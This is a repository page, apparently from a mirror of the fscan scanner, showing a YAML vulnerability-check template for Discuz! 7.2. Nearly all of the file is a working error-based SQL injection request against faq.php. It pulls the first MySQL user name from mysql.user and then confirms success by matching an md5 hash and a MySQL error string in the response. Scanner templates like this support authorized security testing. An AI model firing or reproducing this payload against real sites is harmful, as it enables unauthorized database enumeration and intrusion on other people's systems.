qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/Web_Scan/pocs/discuz-v72-sqli.yml

15 lines
770 B
YAML
Raw Blame History

name: poc-yaml-discuz-v72-sqli
rules:
- method: GET
path: >-
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info</b>: MySQL Query Error")
detail:
author: leezp
Affected Version: "discuz <=v7.2"
vuln_url: "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20"
links:
- https://blog.csdn.net/weixin_40709439/article/details/82780606
Reference in New Issue View Git Blame Copy Permalink